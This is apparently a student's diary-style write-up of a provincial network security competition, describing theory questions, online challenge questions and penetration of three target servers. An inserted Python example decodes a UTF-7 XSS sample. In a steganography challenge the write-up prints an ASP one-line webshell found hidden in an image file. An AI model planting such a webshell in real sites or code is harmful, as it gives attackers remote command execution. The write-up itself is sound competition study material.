This was also the last time I took part in the provincial competition.
After all, future competition slots will be kept for the younger classmates ~
---------------------------------------------------------------------------------------------------------------------
Time: May 21, morning to afternoon
Location: CUIT (Chengdu University of Information Technology)
Contestants: (CUIT Team1) blu3boy, casperkid, hmlttrack (the people in this write-up)
(CUIT Team2) littlefater, vccjis, xiangshen
39 other university teams (117 people)
Because penetration questions carry so much weight in this competition,
our school's teams were put together as 2 penetration players + 1 reverse-engineering player.
Competition introduction:
Contestants bring their own computers.
The questions were provided by Lvmeng Technology (NSFOCUS), 200 points in total.
1. Theory questions, 50 points
All multiple choice:
Sniffing - principles
Scanning - principles
Cryptographic algorithms - DES principles
Firewalls - concepts and configuration
Reverse engineering - unpacking in practice
Buffer overflows - principles
Denial of service - principles of SYN flood, smurf, ping flood, Teardrop and LAND attacks
Malicious code - principles and features of Trojans, viruses, worms and malicious web page code
SQL injection - in practice
Network spoofing - IP address spoofing principles
Log cleanup - Windows, Linux
Operating system vulnerabilities - Windows and Linux
Operating system security policy configuration - Windows and Linux
Network device attacks and secure configuration - routers, switches, etc.
Common DOS commands - ping, nslookup, tracert, etc.
2. Practice questions, 50 points
Six categories of online key-submission questions:
Basic
Web Security
OS
Crack (cracking)
Overflow
Prog (programming)
3. Penetration questions, 100 points
Penetration testing targets:
Bronze server environment:
OS: Windows 2003
Web server: IIS 6.0
Database: SQL Server 2000
Web application: Hishop 5.1
Silver server environment:
OS: Windows 2003
Web server: Apache 2.x
Database: MySQL
Web application: XpressEngine (Korean)
Gold server environment:
OS: Debian
Let's begin.
---------------------------------------------------------------------------------------------------------------------
= Morning =
(7:20 am)
Struggled out of bed
and got ready for today's battle.
It turned out to be raining again.
Too cold in short sleeves, so I brought a coat.
Then got up with hmlttrack and went to the lab together.
Neither of us had any appetite; we just had porridge in the canteen.
Got a text message from the melon doll.
(8:10 am)
Went to the lab to pull the 2 GB memory stick out of cddedevil's machine,
which brought my computer up to 4G = ~
Then the contestants' red shirts were handed out ......
Then moved the computer to the competition venue to test the network.
(9:00 am)
Team sign-in, group photos and so on before the start.
Ran into adomore from Chengdu University, then went back to the venue.
We could see that the address block allocated to our seats was an intranet range, cool.
So presumably the penetration questions would not need a reverse connection,
in which case there would be no intranet penetration either.
(During preparation we had simulated all sorts of possible intranet scenarios... TAT ~)
Also found that y32asm was sitting right behind me ~
(9:30 am)
Competition starts.
Our division of labour:
hmlttrack and I did the theory questions first,
half of them each;
blu3boy went straight at the bronze server penetration question.
It took about 10 minutes to finish the theory questions.
blu3boy had also got a webshell and escalated privileges.
(Before the competition we did not know the web application version, only that it was Hishop 5.x, and we had even dug up a Hishop 5.4 0day)
(I had thought we could use it today to open a gap over the other teams; who knew it would be the lowest version, Hishop 5.1... which left us on the same footing as everyone else)
Then we started searching for the key files.
blu3boy found two key files;
I found the bronze one.
Right from the start we shot up to 1st place = ......
Then blu3boy started on the silver server.
At first glance, a pile of Korean web application code.
I scanned the gold server: ports 22 and 23 were open.
About five minutes later the servers were shut down.
(It seems some teams had jumped into the penetration questions too early, and the organizers wanted teams to do the practice questions first)
So we could only concentrate on the practice questions.
hmlttrack was mainly responsible for the reverse/crack/programming questions,
blu3boy mainly for the SQL injection questions,
and I mainly for the web security questions.
I don't know what they did; I only remember my own questions ~
Basic: Encoding
Just base64-decode the last part of the packet.
Web Security: XSS, which was more interesting than Encoding.
It was a UTF-7 encoding question; one look and I knew exactly what it was.
During the winter holiday before my Alibaba interview I had been told to prepare web security knowledge,
and my mentor gave me a small task: learn the UTF-7-related techniques.
Summary of my notes from back then: http://hi.baidu.com/hackercasper/blog/item/7b0a1b8188abe5c49023d97a.html
As soon as I saw a callback and a UTF-7 BOM, I knew how to do it.
It was just a UTF-7 decoding.
But then I suddenly realised I had no tool at hand.
Later I remembered that spark had once sent me a tool he wrote to detect XSS, XCapture, which has a UTF-7 decode function.
Installed it and finished the question quickly.
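The UTF-7 step described above, as an added example that is not the author's tool and not from the original post: a constructed sample payload carrying the UTF-7 BOM is decoded with Python's built-in codec, and a naive "<script" filter is run before and after decoding to show why a defender has to normalise encodings before inspecting input. The sample string and the filter are constructed for this illustration.

```python
import codecs
import re

# Constructed sample, not taken from the competition: the kind of string the
# UTF-7 XSS question hands you. "+/v8-" is the UTF-7 byte order mark (U+FEFF)
# the write-up mentions; "+ADw-" is "<" and "+AD4-" is ">" in UTF-7.
SAMPLE = "+/v8-+ADw-script+AD4-test+ADw-/script+AD4-"

# A '+' shift sequence of modified base64 ending in '-' is the UTF-7 signature.
UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]*-")


def looks_like_utf7(text: str) -> bool:
    """Cheap pre-check: does the string contain UTF-7 shift sequences?"""
    return UTF7_SHIFT.search(text) is not None


def decode_utf7(text: str) -> str:
    """Decode RFC 2152 UTF-7 and drop a leading BOM so later checks see plain text."""
    decoded = codecs.decode(text.encode("ascii"), "utf-7")
    return decoded.lstrip("\ufeff")


def has_script_tag(text: str) -> bool:
    """Naive blacklist filter of the kind that UTF-7 encoding slips past."""
    return "<script" in text.lower()


def inspect(text: str) -> dict:
    """Run the naive filter on the raw input and again after UTF-7 normalisation."""
    decoded = decode_utf7(text) if looks_like_utf7(text) else text
    return {
        "utf7": looks_like_utf7(text),
        "raw_flagged": has_script_tag(text),
        "decoded": decoded,
        "decoded_flagged": has_script_tag(decoded),
    }


if __name__ == "__main__":
    result = inspect(SAMPLE)
    print(result["decoded"])                                  # <script>test</script>
    print(result["raw_flagged"], result["decoded_flagged"])   # False True
```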
Information Hiding was also a troll question.
Download an image, open it in WinHex, and at the very end there is an ASP one-liner.
Content: <% execute request ("hacker") %>
Its SHA-1 (160-bit) hash is the key.
This question has little practical value.
The practice questions really were trolls.
They differed from the question types in the original outline;
some types on that list never appeared at all.
It was a bit of a guessing game.
The "cat catches mouse" question:
according to vccjis, our teammate from Team2,
you were supposed to notice that the question path http: // xx/3/catch/ contains "catch",
and from that think of capturing packets ......
Facepalm all round ...... = ~
This has nothing to do with security in real life;
it's just like guessing riddles in the old days ......
Continued below == ~
---------------------------------------------------------------------------------------------------------------------
= Noon =
(12:00 am)
Went to the staff canteen for lunch.
On the way we discussed how to split the remaining questions, and our ideas for the silver and gold servers that were about to open.
All our preparation had assumed there would be an intranet; as it turned out all three servers were on public addresses, which gave us all kinds of headaches.
Then I said we could try sniffing from the bronze server,
because port 22 on the gold server was SSH 1.99 (it seems only the 1.x version can be sniffed),
and port 23 was open too, which is telnet, obviously sniffable.
After all, even though the three servers are on public addresses, if they are in the same class C segment we might be able to sniff something.
Right after eating we went back to the venue to resume the fight.
(12:50 am)
Back in the lab, I found that our accounts and webshells on the bronze server had been deleted.
Probably other teams doing bad things.
We just had to take it again.
Then got onto the desktop
and used a self-written ARP tool to scan for intranet IPs
(unlike s.exe, which scans ports over TCP, or Cain, which seems to be based on WinPcap).
The scan showed the bronze server was isolated,
not a stepping stone to the silver or gold servers,
so no need to bother with it any more.
---------------------------------------------------------------------------------------------------------------------
= Afternoon =
(1:00 pm)
Silver and gold servers open.
blu3boy took the silver server (Windows 2003 + PHP);
I took the gold server (Linux).
First ran AWVS against the silver server, at least to get the web path structure clear.
One of the paths leaked the absolute web path (that put my mind a little at ease).
Besides the Korean web application, phpMyAdmin was also found.
Then I used nmap to scan both the silver and gold servers.
The silver server also had 1433 and 8080 open;
8080 was the default IIS page.
Couldn't guess the 1433 password either.
Later I told blu3boy to quickly try search-type injection and wide-byte injection.
On one page, search type + wide byte combined injection seemed to react somewhat.
He kept trying, but unfortunately in the end nothing more came of it ~
(2:00 pm)
hmlttrack never got the 3rd crack question; the algorithm was too complicated and it was taking too much time,
and I gave up on the other questions.
blu3boy and I had wasted a lot of time,
so in the end I had to go back to the practice questions.
I did a log forensics question:
found the attacker's IP address in the log,
then 3389,
but could never figure out the password.